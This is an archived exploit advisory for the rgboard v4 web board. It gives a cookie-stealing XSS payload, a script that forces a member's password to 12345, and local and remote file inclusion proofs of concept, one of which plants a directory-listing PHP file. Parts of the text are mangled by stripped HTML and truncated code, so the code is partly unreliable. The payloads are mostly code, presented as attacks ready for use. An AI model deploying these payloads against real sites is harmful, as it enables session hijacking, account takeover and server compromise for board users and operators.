AOH :: HP Unsorted R :: VA2516.HTM

rgboard v4 (07.07.27) Multiple Vulnerability

rgboard v4 (07.07.27) Multiple Vulnerability
rgboard v4 (07.07.27) Multiple Vulnerability

XSS Vulnerability



$bd_content = rg_conv_text($bd_content,$bd_html); //You have to check 'html use'.



Inject XSS tag : 
"" Hi">onError="window.location=''+document.cookie+'&l='+window.location">Hi there! :) 

/rghunter.php - Makes password as 12345


  $chk = 0;

  for($i = 0; $i < strlen($url); $i++)
	if($url[$i] == '/')
		$chk = $i;
  for($i = $chk; $i < strlen($url); $i++)
  	$url[$i] = "";

  $url = $url."/../rg4_member/modify.php";

"http:// ?>?" method = "post" name = "member_info"> value="">
/*************************** Local File Inclusion Vulnerability /_footer.php if(file_exists($skin_path."footer.php")) include($skin_path."footer.php"); //File inclusion *************************/ poc: //yeah, there is a problem.. file_exists()! //How can we bypass it? I don`t know :) //If we have account in same server with target, we can attack his board easily //Here is the example : /tmp/footer.php handle . "\n"; echo "Path: " . $d->path . "\n"; while (false !== ($entry = $d->read())) { echo $entry."\n"; } $d->close(); ?> //Yeah, It is good, But when we don`t account in that server, How we can beat target? //We can find a clue from //On windows, use //computername/share/filename or \\computername\share\filename to check files on network shares. //As of PHP 5.0.0, this function can also be used with some URL wrappers. Refer to List of Supported Protocols/Wrappers //for a listing of which wrappers support stat() family of functionality. //Do you find clue too? :-O /*************************** Remote File Inclusion Vulnerability /footer.php .. include($_path['counter']."rg_counter.php"); ?> //File inclusion *************************/ poc:[counter]=

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an email address, please forward it with full headers to